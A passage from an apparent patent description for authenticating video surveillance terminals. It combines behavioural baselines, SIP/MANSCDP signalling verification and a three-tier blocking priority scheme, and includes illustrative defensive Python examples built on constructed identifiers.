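    "RecordInfo": "record_query",
    "Catalog": "catalog_query",
    "DeviceInfo": "device_info_query",
}
# operator (SIP user part) -> target resource (DeviceID) -> permitted operations
PERMISSIONS = {
    "34020000002000000001": {
        "34020000001320000001": {"catalog_query", "record_query", "device_info_query"},
    },
}
OPERATOR_IPS = {"34020000002000000001": "192.0.2.10"}  # operator -> expected source IP


def parse_sip(raw):
    """Split a SIP request into request line, lower-cased header dict and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def semantic_tree(raw):
    """Step S701: signalling -> structured tree (method, source IP, operator, fields)."""
    request_line, headers, body = parse_sip(raw)
    if "manscdp+xml" not in headers.get("content-type", "").lower():
        raise ValueError("not a MANSCDP body; private/encrypted strategies not shown")
    via_ip = re.search(r"SIP/2\.0/\w+\s+([\d.]+)", headers.get("via", ""))
    from_user = re.search(r"sip:(\d+)@", headers.get("from", ""))
    root = ET.fromstring(body.encode("utf-8"))
    return {
        "method": request_line.split()[0],
        "source_ip": via_ip.group(1) if via_ip else "",
        "operator": from_user.group(1) if from_user else "",
        "root": root.tag,
        "fields": {child.tag: (child.text or "").strip() for child in root},
    }


def extract_triple(tree):
    """Step S702: (operation type, target resource, operator)."""
    fields = tree["fields"]
    cmd = fields.get("CmdType", "")
    op = OPERATION_TYPES.get(cmd, "unknown")
    if cmd == "DeviceControl" and "PTZCmd" not in fields:
        op = "device_control_other"          # e.g. TeleBoot or RecordCmd
    return op, fields.get("DeviceID", ""), tree["operator"]


def verify_triple(triple, source_ip):
    """Step S703: validate the triple against the preset permission rules."""
    op, resource, operator = triple
    if OPERATOR_IPS.get(operator) != source_ip:
        return {"ok": False, "reason": "operator does not match source IP"}
    if op == "unknown":
        return {"ok": False, "reason": "unrecognised command type"}
    if op not in PERMISSIONS.get(operator, {}).get(resource, set()):
        return {"ok": False, "reason": f"{op} not permitted on {resource}"}
    return {"ok": True, "reason": "authorised"}


def verify_signalling(raw):
    """Whole path: signalling -> semantic tree -> triple -> verification result."""
    tree = semantic_tree(raw)
    triple = extract_triple(tree)
    return triple, verify_triple(triple, tree["source_ip"])


def build_message(from_id, to_id, via_ip, xml_body):
    """Assemble a constructed SIP MESSAGE (sample input only)."""
    head = "\r\n".join([
        f"MESSAGE sip:{to_id}@3402000000 SIP/2.0",
        f"Via: SIP/2.0/UDP {via_ip}:5060;branch=z9hG4bK-constructed",
        f"From: <sip:{from_id}@3402000000>;tag=1",
        f"To: <sip:{to_id}@3402000000>",
        "Call-ID: constructed-1", "CSeq: 1 MESSAGE",
        "Content-Type: Application/MANSCDP+xml",
        f"Content-Length: {len(xml_body)}",
    ])
    return head + "\r\n\r\n" + xml_body


PLATFORM, CAMERA = "34020000002000000001", "34020000001320000001"   # constructed IDs
XML = '<?xml version="1.0" encoding="UTF-8"?>'
CATALOG_QUERY = build_message(PLATFORM, CAMERA, "192.0.2.10",
    f"{XML}<Query><CmdType>Catalog</CmdType><SN>1</SN><DeviceID>{CAMERA}</DeviceID></Query>")
PTZ_CONTROL = build_message(PLATFORM, CAMERA, "192.0.2.10",    # PTZCmd is a placeholder
    f"{XML}<Control><CmdType>DeviceControl</CmdType><SN>2</SN><DeviceID>{CAMERA}</DeviceID>"
    "<PTZCmd>PLACEHOLDER</PTZCmd></Control>")

if __name__ == "__main__":
    for msg in (CATALOG_QUERY, PTZ_CONTROL):
        print(verify_signalling(msg))
```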
[0055] Optionally, controlling the video terminal to execute the authentication process based on the behavior deviation and the protocol verification result includes the following steps: Step S801: Determine the deviation threshold and the protocol verification condition corresponding to the video terminal based on the access behavior type parameter; Step S802: If the behavior deviation is greater than the deviation threshold and the protocol verification result does not meet the protocol verification condition, the authentication process is determined to be the forced blocking authentication process; Step S803: If the behavior deviation is greater than the deviation threshold and the protocol verification result meets the protocol verification condition, the authentication process is determined to be the behavior abnormality authentication process; Step S804: If the behavior deviation is not greater than the deviation threshold and the protocol verification result meets the protocol verification condition, the authentication process is determined to be the operational continuity process; Step S805: Control the video terminal to execute the authentication process; wherein the priority of the forced blocking authentication process is higher than that of the behavior abnormality authentication process, and the priority of the behavior abnormality authentication process is higher than that of the operational continuity process.
[0056] In specific scenarios, based on parameters such as the business type and terminal attributes of the access behavior, and combined with the compliance rules and security baseline of the intelligent policy hub, a matching behavior deviation threshold and protocol compliance verification condition are set for the video terminal as the judgment benchmark for the three-layer priority authentication.
[0057] If the behavioral deviation exceeds the threshold and the protocol verification result does not meet compliance requirements, the L1 forced blocking authentication process is directly initiated. This process has the highest priority and immediately executes access blocking, threat alerts, and reports security incidents. If the behavioral deviation exceeds the threshold but the protocol verification result meets compliance requirements, the L2 behavioral anomaly authentication process is initiated. This process has the next highest priority and executes behavioral tracing, anomaly alerts, and triggers automatic blocking or manual review based on the confidence threshold. If the behavioral deviation does not exceed the threshold and the protocol verification result meets compliance requirements, the L3 operational continuity process is initiated. This process has the lowest priority and allows normal access while simultaneously performing baseline optimization, zombie policy cleanup, and other operational operations.
[0058] Finally, following the priority rule of L1 forced blocking > L2 abnormal behavior > L3 operational continuity, the video terminal is controlled to execute the corresponding authentication process; when there is a policy conflict, the high-priority judgment result is strictly executed, and at the same time, the intelligent policy center is linked to complete rule fusion, event correlation analysis and visual monitoring to form a closed-loop protection.
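The decision of steps S801 to S805 and the L1 > L2 > L3 conflict rule, as an added Python example that is not part of the patent. The per-access-type thresholds, the L2 confidence cut-off, and the handling of the combination the steps leave unnamed (deviation within threshold but protocol verification failed) are assumptions.

```python
from enum import IntEnum

# Constructed example (not the patent's own code) for steps S801-S805 and the
# priority rule of paragraphs [0055]-[0061]. Thresholds, the L2 confidence
# cut-off and the "normal behaviour + failed protocol check" case are assumptions.


class AuthProcess(IntEnum):
    """The numeric value doubles as priority: higher wins on conflict (S805)."""
    L3_OPERATIONAL_CONTINUITY = 1
    L2_BEHAVIOR_ABNORMAL = 2
    L1_FORCED_BLOCKING = 3


# access behaviour type parameter -> deviation threshold (step S801)
DEVIATION_THRESHOLDS = {
    "realtime_stream": 0.30,
    "record_retrieval": 0.20,
    "ptz_control": 0.15,        # control paths get the tightest bound (assumed)
}
DEFAULT_THRESHOLD = 0.25
L2_AUTO_BLOCK_CONFIDENCE = 0.80  # assumed cut-off for L2 automatic blocking


def protocol_condition_met(protocol_result):
    """Protocol verification condition: the triple was authorised."""
    return bool(protocol_result.get("ok"))


def decide(access_type, deviation, protocol_result):
    """Steps S801-S804: map (deviation, protocol verification) to a process."""
    threshold = DEVIATION_THRESHOLDS.get(access_type, DEFAULT_THRESHOLD)
    over = deviation > threshold
    ok = protocol_condition_met(protocol_result)
    if over and not ok:
        return AuthProcess.L1_FORCED_BLOCKING
    if over and ok:
        return AuthProcess.L2_BEHAVIOR_ABNORMAL
    if not over and ok:
        return AuthProcess.L3_OPERATIONAL_CONTINUITY
    # Not covered by S802-S804: behaviour within threshold but the signalling
    # failed compliance. Treated as L1 here (assumption), since [0060] bases
    # L1 on compliance rules.
    return AuthProcess.L1_FORCED_BLOCKING


def resolve_conflict(processes):
    """Step S805 / [0061]: when several policies fire, the highest priority wins."""
    return max(processes)


def actions_for(process, confidence=0.0):
    """Operations each process executes, following [0057]."""
    if process is AuthProcess.L1_FORCED_BLOCKING:
        return ["block_access", "threat_alert", "report_incident"]
    if process is AuthProcess.L2_BEHAVIOR_ABNORMAL:
        follow_up = "auto_block" if confidence >= L2_AUTO_BLOCK_CONFIDENCE else "manual_review"
        return ["trace_behavior", "anomaly_alert", follow_up]
    return ["allow", "optimise_baseline", "clean_zombie_policies"]


def authenticate(access_type, deviation, protocol_result, confidence=0.0):
    """Full path for one access behaviour: decision plus the actions to run."""
    process = decide(access_type, deviation, protocol_result)
    return process, actions_for(process, confidence)


if __name__ == "__main__":
    # Constructed inputs: a PTZ command with a large deviation and a failed
    # protocol check, then the same deviation with an authorised triple.
    print(authenticate("ptz_control", 0.76, {"ok": False}))
    print(authenticate("ptz_control", 0.76, {"ok": True}, confidence=0.9))
    print(resolve_conflict([AuthProcess.L3_OPERATIONAL_CONTINUITY,
                            AuthProcess.L2_BEHAVIOR_ABNORMAL]))
```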
[0059] The core of the above steps is to resolve the performance degradation caused by multi-channel policy conflicts and specification library expansion, which involves the following two major capabilities: 1. Resolving policy conflicts: establishing a three-tier priority system.
[0060] L1 (Forced Blocking): Based on rules such as compliance requirements and characteristics of high-risk vulnerability exploitation, it has the highest priority for forced blocking; L2 (Abnormal Behavior): Based on the analysis of deviations from the terminal behavior baseline (such as unauthorized access), with the next highest priority; L3 (Operational Optimization): Suggestions for cleaning up non-whitelisted access and zombie strategies based on intelligent traffic learning, with the lowest priority.
[0061] When conflicts occur, the strategy is executed from highest to lowest. If the L1 strategy determines that blocking is necessary, the final result is blocking. When L2 and L3 conflict, L2 takes precedence, prompting an alarm for automatic blocking or manual review. For L2 / L3 strategies, source tracing (such as behavioral deviation + protocol anomalies) will be performed. If the threshold is exceeded, automatic blocking will be executed to reduce the problem of delayed manual response.
[0062] 2. Rule fusion optimization: Establishing rule relationships based on attack behavior.
[0063] Attack behavior relationship construction: Attack rules are categorized according to "attack stage" and "attack method," establishing parent-child relationships between rules. Once an attack rule is matched, the rules are automatically logically merged. An alarm is triggered whenever any rule is matched, avoiding duplicate matches. Simultaneously, it features visualized collaborative monitoring: providing a unified dashboard that displays the entire network's attack situation, device resource status, and security event topology in real time. It also correlates terminal behavior alarms with network protocol attack events for rapid fault and threat localization.
[0064] The entity executing the above method can be an intelligent central hub, which interacts with the IoT terminal devices (i.e., video terminals) through a video security access gateway acting as a proxy, as shown in Figure 2. The method involves five core layers, each with clearly defined responsibilities and data linkage, forming a complete closed loop of security protection: 1. Top-level core control layer: the intelligent hub (the system brain, solving the problem of "unintelligent policies"); 2. Upper baseline support layer: the trusted software baseline system and the behavioral baseline system (the terminal's trusted benchmark, solving the problem of "terminal agnosticness"); 3. Intermediate data hub layer: software and process information (data aggregation and distribution, connecting the baseline and the gateway); 4. Intermediate security boundary layer: the video security access gateway (access authentication and threat detection, solving the problem of "invisible impersonation"); 5. Bottom terminal device layer: IoT terminal devices (monitoring objects and data sources, terminal-side behavior collection).
[0065] 1. The top-level core control layer is the intelligent hub. The intelligent hub is the core control brain of the entire system, undertaking the core functions of baseline lifecycle management, intelligent policy scheduling, conflict resolution, and rule optimization. Baseline Management and Updates: The intelligent hub interacts bidirectionally with the "Trusted Software Baseline" database on the left and the "Behavioral Baseline" database on the right, supporting the storage, modification, and dynamic iteration of baselines: When a terminal first joins the network / upgrades its firmware, it collects all trusted information about the terminal to complete the initial construction of the baseline; during daily operation and maintenance, the baseline is dynamically optimized based on terminal behavior data and security events to avoid baseline stagnation.
[0066] Baseline Synchronization Distribution: The intelligent hub synchronizes the "Trusted Software Baseline" to the lower-level "Trusted Software Baseline Library" and the "Behavioral Baseline" to the lower-level "Behavioral Baseline Model Library," providing authoritative benchmarks for behavioral verification on the terminal side and gateway side.
[0067] Intelligent policy control: It can include a three-layer priority authentication system. The intelligent hub, based on the behavior data of all terminals in the network and the protocol verification results, achieves the following: Strategy conflict resolution: Strictly follow the priority rule of "L1 mandatory blocking > L2 abnormal behavior > L3 operational continuity" to resolve multi-strategy conflict issues; Rule fusion optimization: Build parent-child relationships for rules based on attack stage / method to avoid duplicate alerts, while also enabling security event correlation analysis and visual monitoring; It completely solves the pain points of manual policy configuration failure, redundancy (zombie policies), and delayed updates, and realizes automated and intelligent policy management.
[0068] 2. Upper Baseline Support Layer: Trusted Software Baseline and Behavioral Baseline. This layer is the core benchmark source for terminal trust verification, addressing the internal threat problem of "terminal agnosticity" from two dimensions: software integrity and operational behavior.
[0069] The left side of Figure 2 represents the trusted software baseline system; the top layer is the trusted software baseline database, which stores all trusted software information collected when the video terminal first enters the network / upgrades firmware, and is the core benchmark for verifying the integrity of the terminal software; the lower layer is the trusted software baseline library, which receives the trusted software baselines synchronized by the intelligent hub and stores the four core software attributes of the terminal: software name, software version, software hash (SHA-256), and operating system (used for firmware tampering detection and defense against internal attacks that implant malicious firmware).
[0070] Data flow: Intelligent central storage / modification of trusted software baseline → synchronization to trusted software baseline library → providing software-dimensional benchmark data for intermediate layer software and process information.
[0071] The right side of Figure 2 represents the behavior baseline system; the top layer is the behavior baseline database, which stores the dynamic behavior benchmark model of the video terminal for deviation verification of the terminal's behavior during runtime. The lower layer is the behavior baseline model library, which receives the behavior baseline synchronized by the intelligent hub and stores the four core behavioral characteristics of the terminal: process creation, open ports, external connections, and file read / write (used for abnormal behavior detection, identifying malicious processes, malicious external connections, and other internal threats).
[0072] Data flow: Intelligent central storage / modification of behavioral baseline → synchronization to behavioral baseline model library → providing benchmark data for behavioral dimensions of intermediate layer software and process information.
[0073] 3. Intermediate Data Hub Layer: Software and Process Information. This layer is the core data hub connecting the upper-layer baseline library and the lower-layer gateway, undertaking the functions of data aggregation, feature extraction, and unified distribution.
[0074] Data aggregation: Integrate software attribute data from the trusted software baseline library on the left and behavioral feature data from the behavioral baseline model library on the right to form a complete software + behavior profile of the terminal, providing full-dimensional data support for subsequent verification.
[0075] Data distribution: The aggregated software and process baseline information is uniformly distributed to multiple lower-layer video security access gateways, providing a baseline basis for behavior deviation calculation and protocol depth analysis on the gateway side.
[0076] 4. Intermediate Security Boundary Layer: Video Security Access Gateway. This layer serves as the security boundary gateway between the terminal and the central control unit. It is a critical node for defending against external spoofing attacks and internal terminal threats, addressing the external-threat problem of "invisible spoofing". This method employs a distributed deployment of multiple video security access gateways, each connecting to IoT terminal devices in different regions / batches, supporting parallel access and security management of a large number of video terminals. Core security capabilities are as follows: Behavioral deviation verification: Based on the software and process baselines issued by the intelligent hub, the similarity of the behavioral fingerprint data uploaded by the terminal is compared, the behavioral deviation is calculated, and internal threats to the terminal such as firmware tampering, abnormal processes, and malicious external connections are accurately identified, upgrading from "identity verification" to "ontology trust".
[0077] Deep Protocol Analysis and Verification: Based on three protocol analysis strategies (comprehensive coverage of public / private / encrypted protocols), deep analysis of terminal protocol signaling is performed. The "operation type + target resource + operator" triple is extracted through the Signalling Semantic Tree (SST); resource-level access control is implemented, accurately identifying external spoofing threats such as unauthorized PTZ control, unauthorized video stream calls, and video replay attacks, addressing the pain point that standard protocols cannot cover dedicated / private protocols in the power industry.
[0078] Authentication control execution: Based on a three-tier priority authentication system, the corresponding authentication process is executed according to the degree of behavioral deviation and the protocol verification result, as follows: Excessive behavioral deviation + protocol verification failure: triggers L1 forced blocking, immediately intercepting access; If the behavior deviation exceeds the limit and the protocol verification passes: trigger an L2 behavior anomaly alarm, and execute automatic blocking or manual review; Normal behavior + protocol verification passed: L3 operation continues, normal release and baseline optimization.
[0079] 5. Bottom Terminal Device Layer: IoT Terminal Devices. This layer is the system's monitoring object and data source, providing raw terminal-side data for upper-layer verification. Each terminal group contains multiple video surveillance cameras and an agent (lightweight security probe) deployed on the terminal side. The core capabilities of the terminal side are as follows: Behavior monitoring and collection: The agent monitors the terminal's access behavior in real time based on three preset behavior monitoring points: file writing, network connection, and process creation. Behavioral fingerprint generation: The continuous behavioral sequence monitored is compressed into a lightweight behavioral fingerprint vector through a Markov chain model. Only the fingerprint hash value is uploaded, which greatly reduces the transmission bandwidth consumption. Trusted access control: All video terminals must pass the authentication and verification of the video security access gateway before they can access the system, realizing trusted control of the terminal throughout its entire lifecycle.
[0080] The complete data flow loop of the above method is as follows: Baseline construction phase (first-time network access / firmware upgrade of terminal): The terminal agent collects terminal software attributes and behavioral characteristics - uploads them to the video security access gateway - aggregates them to the intelligent hub - builds trusted software baseline and behavioral baseline - synchronizes them to the baseline library - distributes them to the gateway, and completes the initial construction of the trusted baseline of the terminal.
[0081] During routine operation (terminals are continuously online): The terminal agent collects behavioral data in real time, generates behavioral fingerprints, and uploads them to the gateway. The gateway calculates the behavioral deviation based on the baseline and performs in-depth analysis and verification of the protocol signaling. The gateway reports the verification results to the intelligent hub. The intelligent hub executes authentication control based on a three-layer priority policy. The gateway executes corresponding operations (blocking / alarming / allowing), while the intelligent hub dynamically optimizes the baseline and policies, forming a complete security protection closed loop of "collection-verification-control-optimization".
[0082] The above-mentioned video terminal authentication control method has the following technical effects: Significantly improved detection depth and accuracy: By integrating terminal behavior and network protocol analysis, this solution breaks through the limitations of single-point defense. For example, if an internal terminal is manipulated to send abnormal video streams, this solution can detect the abnormal network connection behavior of the process from the terminal and identify the violation of the video stream protocol fields from the gateway side, achieving cross-validation and greatly reducing false positives and false negatives.
[0083] Intelligent defense and improved operation and maintenance efficiency: The three-layer priority system resolves conflicts between multiple policies, and the attack behavior fusion technology avoids duplicate alarm matching, directly optimizing automatic response issues. At the same time, no manual policy updates are required, which greatly improves operation and maintenance efficiency.
[0084] Corresponding to the above embodiments of the video terminal authentication control method, this invention also provides a video terminal authentication control system, as shown in Figure 3. The system includes: Acquisition layer 310: Used to set behavior monitoring points based on kernel environment parameters of the video terminal, construct a behavior baseline through the attribute values of executable files in the system path of the video terminal, and determine the protocol parsing strategy through the protocol feature bytes of the video terminal; Access layer 320: Used to monitor the access behavior of video terminals in real time using the behavior monitoring points, and generate behavior fingerprint data through the continuous behavior sequence corresponding to the access behavior; Control layer 330: Used to calculate the behavioral deviation between the behavioral fingerprint data and the behavioral baseline, and to obtain the protocol verification result of the access behavior after parsing and verifying the protocol signaling of the access behavior using the protocol parsing strategy; Application layer 340: Used to control the video terminal to perform the authentication process based on the behavior deviation and the protocol verification result.
[0085] Specifically, Figure 4 shows another video terminal authentication control system, which, from bottom to top, consists of "acquisition layer 310 - access layer 320 - control layer 330 - application layer 340". It fully matches the technical solution of the aforementioned video terminal authentication control method, and constructs a full-process security closed loop from terminal data acquisition, full protocol adaptation, and intelligent authentication management and control to business visualization operation and maintenance. It specifically addresses the three core pain points of existing technologies: "terminal agnosticity, invisible counterfeiting, and unintelligent policies". At the same time, it forms a complete technical mapping with the preceding system architecture diagram.
[0086] Acquisition Layer 310: Video Security Access Switching Layer (Data Entry and Terminal Perception Layer). The acquisition layer is the source of raw data and the foundation for terminal perception of the entire system. Deployed on the video terminal side / access side, it provides full-dimensional raw data support for upper-layer baseline construction, behavior verification, and protocol parsing. It is a fundamental link in solving the problem of "terminal agnosticness".
[0087] The video and audio transmission submodule is responsible for carrying the raw business traffic such as real-time audio and video streams from the video terminal camera, PTZ control signaling, and device status data. It is the source of all access behaviors and protocol signaling.
[0088] The static fingerprint collection submodule is responsible for collecting static attribute information such as filename, version number, SHA-256 hash value of executable files in the critical path of the terminal system, as well as terminal IP / MAC address and manufacturer identification during the initial network access / firmware upgrade of the terminal; and collecting dynamic behavior characteristics of the terminal (processes, ports, connections, file operations) during daily operation and maintenance.
[0089] The data interface transmission submodule functions as follows: It compresses the collected behavioral data into behavioral fingerprint vectors (only the hash value is uploaded) through the lightweight proxy probe on the terminal side, and transmits them to the upper-layer gateway with low bandwidth; at the same time, it carries the control signaling interaction between the terminal and the gateway.
[0090] Access Layer 320: Audio and Video Image Data Access Adaptation (Full Protocol Parsing and Adaptation Layer). The access layer is a protocol deep parsing and standardization adaptation layer, which fundamentally solves the pain point of "invisible counterfeiting" in existing technologies. It achieves full-coverage deep parsing of power industry-specific protocols, vendor-owned protocols, and encryption protocols, providing standardized data support for upper-layer access control and threat detection.
[0091] The access layer is divided into three categories according to protocol type: standard public protocols, such as GB / T 28181 (video surveillance network transmission standard), GB 35114 (video surveillance information security standard, encrypted video protocol), GA / T 1400 (video image application standard), and other power / security industry-specific standard protocols.
[0092] General streaming media / security standard protocols: including general video surveillance protocols such as RTSP (Real Time Streaming Protocol), RTMP (Real-Time Messaging Protocol), and ONVIF (Open Network Video Interface Forum).
[0093] Vendor-specific protocols: includes vendor-defined video protocols such as those of Hikvision (HIK) and Dahua. By using the n-gram algorithm to extract fixed-offset feature bytes and automatically construct the protocol state machine, deep reverse analysis of private protocols is achieved, identifying illegal state transitions and malicious control commands.
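The fixed-offset n-gram feature extraction and state-machine learning described above, as an added Python example that is not part of the patent: feature bytes are learned from captured frames of two made-up private protocols, used to select the parsing strategy for a new frame, and the observed command transitions are used to flag transitions never seen in recorded sessions. The frame layouts, vendor names, byte values, command offset and the match threshold are all constructed.

```python
# Constructed example (not the patent's own code) for paragraph [0093]. The
# frame layouts, vendor names, byte values, command offset and match
# threshold are made up; a real deployment would learn them from captures.

N = 2                   # n-gram width in bytes
MIN_MATCH = 0.8         # fraction of feature n-grams a frame must match (assumed)


def learn_features(samples, n=N):
    """Fixed-offset feature bytes: the n-grams identical across every sample."""
    span = min(len(s) for s in samples) - n + 1
    features = {}
    for off in range(span):
        grams = {s[off:off + n] for s in samples}
        if len(grams) == 1:
            features[off] = grams.pop()
    return features


def match_score(frame, features, n=N):
    """Share of the learned feature n-grams present at their offsets in frame."""
    hits = sum(1 for off, gram in features.items() if frame[off:off + n] == gram)
    return hits / len(features) if features else 0.0


def identify(frame, signatures, min_match=MIN_MATCH):
    """Pick the parsing strategy whose feature bytes the frame matches best."""
    best, best_score = "unknown", 0.0
    for name, features in signatures.items():
        score = match_score(frame, features)
        if score > best_score:
            best, best_score = name, score
    return best if best_score >= min_match else "unknown"


def learn_transitions(sessions, cmd_offset):
    """Build the command state machine from ordered frames of recorded sessions."""
    allowed = set()
    for session in sessions:
        cmds = [f[cmd_offset] for f in session]
        allowed.update(zip(cmds, cmds[1:]))
    return allowed


def illegal_transitions(session, allowed, cmd_offset):
    """Return the (previous_cmd, cmd) pairs never seen while learning."""
    cmds = [f[cmd_offset] for f in session]
    return [t for t in zip(cmds, cmds[1:]) if t not in allowed]


# Constructed captures. "vendor_a": AA 55 | version 01 | length (2 bytes) | cmd | payload.
VENDOR_A = [
    bytes([0xAA, 0x55, 0x01, 0x00, 0x06, 0x10, 0x00, 0x01, 0x7F]),        # login
    bytes([0xAA, 0x55, 0x01, 0x00, 0x07, 0x11, 0x00, 0x02, 0x03, 0x3C]),  # stream start
    bytes([0xAA, 0x55, 0x01, 0x00, 0x06, 0x20, 0x01, 0x00, 0x9A]),        # ptz
]
# "vendor_b": 5A A5 | length (2 bytes) | cmd | payload.
VENDOR_B = [
    bytes([0x5A, 0xA5, 0x00, 0x05, 0x01, 0x00, 0x00, 0x00, 0x10]),
    bytes([0x5A, 0xA5, 0x00, 0x04, 0x02, 0x00, 0x11, 0x22]),
]
SIGNATURES = {"vendor_a": learn_features(VENDOR_A), "vendor_b": learn_features(VENDOR_B)}
A_CMD_OFFSET = 5
# VENDOR_A, in capture order, doubles as one recorded session: login -> stream -> ptz.
ALLOWED_A = learn_transitions([VENDOR_A], A_CMD_OFFSET)

if __name__ == "__main__":
    new_frame = bytes([0xAA, 0x55, 0x01, 0x00, 0x05, 0x30, 0x00, 0xEE])
    print(SIGNATURES["vendor_a"], identify(new_frame, SIGNATURES))
    # ptz before login was never observed: flagged as an illegal transition
    print(illegal_transitions([VENDOR_A[2], VENDOR_A[0]], ALLOWED_A, A_CMD_OFFSET))
```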
[0094] The access layer completely solves the shortcomings of existing technologies that can only identify a limited number of general protocols, achieving full protocol coverage of "public + private + encryption", providing a foundation for semantic-level verification of protocol signaling and resource-level access control, and accurately identifying advanced external threats such as illegal PTZ control and unauthorized video stream access.
[0095] Control Layer 330: Intelligent Policy Control Layer (Core Authentication and Management Engine Layer). Control Layer 330 is the core management brain and authentication execution engine of the entire system. It integrates dual authentication logic based on behavior deviation and protocol verification results, executes three-level priority intelligent policies, and is the core hub for solving three major technical pain points.
[0096] The device whitelist permission submodule's function is to establish a terminal device whitelist mechanism based on trusted software baselines and behavioral baselines, allowing only legitimate terminals that meet the baseline requirements to access the system. This upgrades authentication to ontology trust, preventing internal attacks launched by compromised legitimate terminals.
[0097] The device identity authentication submodule functions as follows: it performs dual authentication based on the deviation of the execution behavior and the protocol verification result, replacing the coarse-grained authentication of traditional MAC / IP binding and pre-shared keys. It is the core execution link to solve the problem of "terminal agnosticity".
[0098] The access control submodule's function is to implement fine-grained access control at the resource level based on the operation type + target resource + operator triplet, according to protocol signaling parsing, distinguishing different operation permissions such as real-time video stream / historical recording, PTZ control / playback, etc. This module addresses external spoofing threats such as unauthorized video retrieval and unauthorized PTZ control, and is the core execution link in solving the "spoofing invisible" problem.
[0099] The protocol identification strategy submodule is responsible for dynamically identifying the protocol type of terminal traffic, matching the corresponding parsing strategy, and achieving automated identification and verification of the entire protocol.
[0100] The content filtering and inspection submodule performs compliance checks on video content, extracts and verifies digital watermarks, and defends against video replay attacks and illegal content transmission.
[0101] The functions of the data traffic control submodule are: to monitor terminal network connection behavior, control abnormal external traffic and large-scale attacks, and restrict unauthorized data transmission.
[0102] The functions of the intrusion threat strategy submodule are: to implement a three-tier priority authentication system (L1 forced blocking > L2 abnormal behavior > L3 operational continuity), automatically resolve multi-policy conflicts, and execute authentication control according to priority.
[0103] Application Layer 340: Four Major Business Centers (Visualized Operation and Maintenance Management Entry Point). Application Layer 340 serves as the system's human-computer interaction entry point and business visualization management layer. It transforms underlying authentication, control, and alarm data into operable and analyzable business functions, achieving a closed loop of visualized management and automated operation and maintenance for the entire system.
[0104] The four main sub-modules are as follows: 1. Strategy Center (Intelligent Strategy Lifecycle Management); its core function is to solve the problem of unintelligent strategies, enabling automated configuration, iteration, and optimization of strategies; specifically, it implements the following functions: Security policy distribution: Distribute authentication policies, access control rules, and protocol parsing policies to the control layer to achieve unified policy scheduling across the entire link; Strategy List Query: Visualizes the entire network's strategy list, automatically identifies and cleans up "zombie strategies" (redundant and invalid strategies), and solves the problem of strategy bloat; Intelligent adjustment baseline: Based on terminal behavior data and security events, dynamically adjust the behavior deviation threshold and protocol verification conditions to optimize the trusted software baseline and behavior baseline, and realize the automated iteration of policies.
[0105] 2. Event Center (Full Lifecycle Management of Security Events); Its core function is to achieve unified alerting, tracing, and analysis of security events across the entire network, enabling rapid threat response; Specifically, it implements the following functions: Access alarm events: Terminal access authentication anomaly alarms (such as excessive behavior deviation or protocol verification failure); Threat and intrusion incidents: Alarms for attack incidents such as unauthorized PTZ control, unauthorized video access, and firmware tampering, along with the associated abnormal behavior and protocol data; Asset abnormal events: Alarms for abnormal terminal asset status (such as firmware version tampering or abnormal external connections).
[0106] 3. Asset Center (full lifecycle management of terminal assets). Its core positioning is to solve the problem of "terminal agnosticism" and realize visualized management of all video terminal assets across the network; specifically, it implements the following functions. Intelligent asset collection: automatically collects comprehensive asset information from all network terminals, including software, hardware, network, and manufacturer information. Asset profile overview: generates a unique asset profile for each terminal, encompassing "software integrity + operational behavior," providing a clear view of the terminal's trustworthiness. Risk asset report: based on behavioral deviation and protocol verification results, generates statistical reports on risk assets to identify high-risk terminals.
[0107] 4. Monitoring Center (real-time monitoring of network-wide operation status). Its core function is to achieve real-time monitoring and rapid troubleshooting of the network's security and operational status; specifically, it implements the following functions. Traffic threshold monitoring: real-time monitoring of video stream and network traffic against thresholds, with real-time alerts for abnormal traffic.
[0108] Rapid troubleshooting: correlates terminal behavior alarms with network protocol attack events to quickly pinpoint the root cause of faults or threats.
[0109] Behavioral baseline analysis: real-time analysis of deviation trends from the terminal's behavioral baseline, with dynamic optimization of the baseline model.
[0110] The entire data flow and closed-loop logic of the aforementioned video terminal authentication control system is as follows. Data uplink (terminal to central hub): acquisition layer (raw data acquisition) - access layer (full protocol parsing and adaptation) - control layer (dual authentication + policy execution) - application layer (visual display). The terminal-side agent collects behavioral data and protocol signaling, the gateway completes protocol parsing and behavioral fingerprint verification, the intelligent central hub executes policy control, and the application layer displays alarms, assets, and monitoring data, completing the full-link flow of data from the terminal to the management end.
[0111] Policy downlink (central hub to terminal): application layer (policy configuration / baseline adjustment) - control layer (policy conversion / rule distribution) - access layer (protocol policy update) - acquisition layer (monitoring point / collection rule update). The application layer's policy center distributes optimized policies and baselines, the control layer converts them into authentication rules, the access layer updates the protocol parsing policy, and the acquisition layer updates the behavior monitoring points, realizing full-link distribution and dynamic iteration of policies.
[0112] Automated operation and maintenance closed loop: Events, assets, and monitoring data from the application layer are continuously fed back to the policy center to dynamically optimize baselines and policies, which are then distributed to the underlying layer, forming a complete security closed loop of "collection-verification-control-optimization". This completely solves the problem of lag in manual operation and maintenance and enables the system to learn and optimize itself.
[0113] As can be seen from the above-mentioned video terminal authentication control system, the system performs dual authentication control from two analytical levels: the behavioral deviation of the video terminal and the protocol verification results. The behavioral deviation can detect the implantation of malicious files (including malicious firmware) and abnormal process activity, thereby solving the problem of "terminal agnosticism". At the same time, the protocol verification results effectively defend against illegal video access based on protocol vulnerabilities, thereby solving the problem of "impersonation invisibility" in access behavior. In addition, the system performs unified scheduling for video terminals based on the behavioral deviation and protocol verification results, and can resolve conflicts between multiple policies through a multi-level priority authentication process, thereby solving the problem of "unintelligent policies".
[0114] The video terminal authentication control system provided in this embodiment of the invention has the same implementation principle and technical effects as the aforementioned video terminal authentication control method embodiment. For the sake of brevity, any parts not mentioned in the system embodiment can be referred to the corresponding content in the aforementioned video terminal authentication control method embodiment.
[0115] This embodiment also provides an electronic device, the structural schematic diagram of which is shown in Figure 5. As shown, the device includes a processor 101 and a memory 102, wherein the memory 102 is used to store one or more computer instructions, which are executed by the processor to implement the steps of the video terminal authentication control method described above.
[0116] The electronic device shown in Figure 5 also includes a bus 103 and a communication interface 104, with the processor 101, communication interface 104 and memory 102 connected via the bus 103.
[0117] The memory 102 may include high-speed random access memory (RAM) and may also include non-volatile memory, such as at least one disk storage device. The bus 103 may be an ISA bus, a PCI bus, an EISA bus, etc. The bus can be divided into an address bus, a data bus, a control bus, etc. For ease of representation, the bus is drawn in Figure 5 as a single double-headed arrow, but this does not mean that there is only one bus or one type of bus.
